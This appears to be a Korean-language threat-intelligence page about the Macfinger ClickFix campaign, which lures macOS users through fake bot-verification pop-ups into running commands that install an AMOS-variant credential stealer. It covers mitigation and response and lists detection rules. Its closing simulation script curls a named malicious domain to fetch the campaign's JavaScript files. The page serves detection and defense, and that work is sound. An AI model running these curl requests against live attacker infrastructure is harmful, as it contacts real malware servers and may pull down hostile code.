SOC Prime Bias: High

24 Sep 2026 06:40 UTC

맥핑거 클릭픽스 캠페인

Author Photo
SOC Prime Team linkedin icon 팔로우
맥핑거 클릭픽스 캠페인
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

Macfinger ClickFix로 추적된 새로운 소셜 엔지니어링 캠페인이 합법적인 웹사이트에 악성 스크립트를 삽입하는 방식으로 macOS 사용자를 대상으로 삼습니다. 공격은 피해자가 macOS 전용 멀웨어를 다운로드하는 명령을 실행하도록 속이는 가짜 봇 보호 페이지를 제공합니다. 페이로드는 자격 증명 및 기타 사용자 정보를 훔치는 것을 목표로 하는 Atomic macOS Stealer (AMOS)의 변종으로 보입니다.

조사

조사에서는 가짜 검증 팝업을 표시하도록 삽입된 스크립트가 있는 합법적인 웹사이트가 밝혀졌습니다. 네트워크 트래픽 분석 결과, 사용자 추적을 위한 전용 도메인과 멀웨어 전달 및 명령 제어(C2) 통신을 지원하는 여러 IP 주소가 확인되었습니다. 관찰된 트래픽 패턴은 HTTP POST 요청을 통한 자격 증명 및 시스템 정보 탈취를 나타냅니다.

완화

사용자는 예상치 못한 브라우저 팝업 또는 가짜 봇 검증 페이지가 제시하는 지시를 따르지 않도록 훈련받아야 합니다. 조직은 ClickFix 캠페인과 관련된 알려진 악성 도메인 및 IP 주소를 차단하기 위해 웹 필터링을 배포해야 합니다. 비표준 포트를 통해 신뢰할 수 없는 IP 주소로의 비정상적인 아웃바운드 연결을 모니터링하는 것도 권장됩니다.

대응

Macfinger ClickFix 활동이 감지되면, 영향을 받은 macOS 호스트를 즉시 격리하여 추가 데이터 탈취를 중지해야 합니다. 대응자는 자격 증명 누출 정도를 파악하기 위해 전체 포렌식 조사를 수행해야 합니다. 잠재적으로 노출된 자격 증명은 재설정하고, 시스템은 무단 쉘 스크립트나 Mach-O 바이너리와 같은 지속성 메커니즘이 있는지 점검해야 합니다.

공격 흐름

이 부분은 아직 업데이트 중입니다.

탐지

가능한 IP 조회 도메인 통신 시도 (dns를 통해)

SOC Prime 팀
2026년 9월 23일

비정상적인 최상위 도메인(TLD) DNS 요청에 의한 의심스러운 명령 및 제어 (dns를 통해)

SOC Prime 팀
2026년 9월 23일

가능한 System_profiler 열거 시도 (process_creation을 통해)

SOC Prime 팀
2026년 9월 23일

Base64 인코딩된 문자열 조작 가능성 [MacOS] (cmdline을 통해)

SOC Prime 팀
2026년 9월 23일

의심스러운 Curl 실행 시도 [MacOS] (cmdline을 통해)

SOC Prime 팀
2026년 9월 23일

IOCs (HashSha256) 감지: Macfinger ClickFix 캠페인

SOC Prime AI 규칙
2026년 9월 23일

IOCs (SourceIP) 감지: Macfinger ClickFix 캠페인

SOC Prime AI 규칙
2026년 9월 23일

IOCs (DestinationIP) 감지: Macfinger ClickFix 캠페인

SOC Prime AI 규칙
2026년 9월 23일

Macfinger ClickFix 캠페인 트래픽 감지 [방화벽]

SOC Prime AI 규칙
2026년 9월 23일

Macfinger ClickFix 스크립트 삽입 감지 [웹서버]

SOC Prime AI 규칙
2026년 9월 23일

시뮬레이션 실행

  • 공격 시나리오 및 명령: 공격자는 “ClickFix”라는 소셜 엔지니어링 기법을 사용하여 사용자가 버튼(종종 가짜 “수정” 또는 “업데이트”)을 클릭하도록 유도하여 악성 스크립트를 실행합니다. 이 시뮬레이션에서는 Macfinger 제어 도메인에 요청을 보내는 클라이언트 측 브라우저/에이전트의 마지막 단계를 모방합니다. velvet-otter-glagceis.life 에서 악성 파일을 가져옵니다. .js 이 요청은 탐지 논리에서 세 가지 특정 선택 기준 중 하나와 일치하도록 설계되었습니다.

  • 회귀 테스트 스크립트:

    #!/bin/bash
    # Macfinger ClickFix 탐지 규칙을 트리거하기 위한 시뮬레이션 스크립트
    
    echo "[*] Macfinger ClickFix 시뮬레이션 시작..."
    
    # 대상 1: selection1 (사이트 매개변수)
    echo "[*] selection1에 대한 요청 시뮬레이션 중..."
    curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.js?site=test_payload"
    
    # 대상 2: selection2 (특정 해시 파일)
    echo "[*] selection2에 대한 요청 시뮬레이션 중..."
    curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.4b1009ff6c3f.js"
    
    # 대상 3: selection3 (ext-b 파일)
    echo "[*] selection3에 대한 요청 시뮬레이션 중..."
    curl -s -o /dev/null "http://velvet-otter-glagceis.life/ext-b.4f9db6afad06a.js"
    
    echo "[+] 시뮬레이션 완료. SIEM에서 경보를 확인하십시오."
  • 정리 명령:

    # 이들은 아웃바운드 네트워크 요청이므로 로컬 정리가 필요하지 않습니다.
    # 로컬 파일이 생성되었으면 삭제:
    rm -f /tmp/macfinger_test_*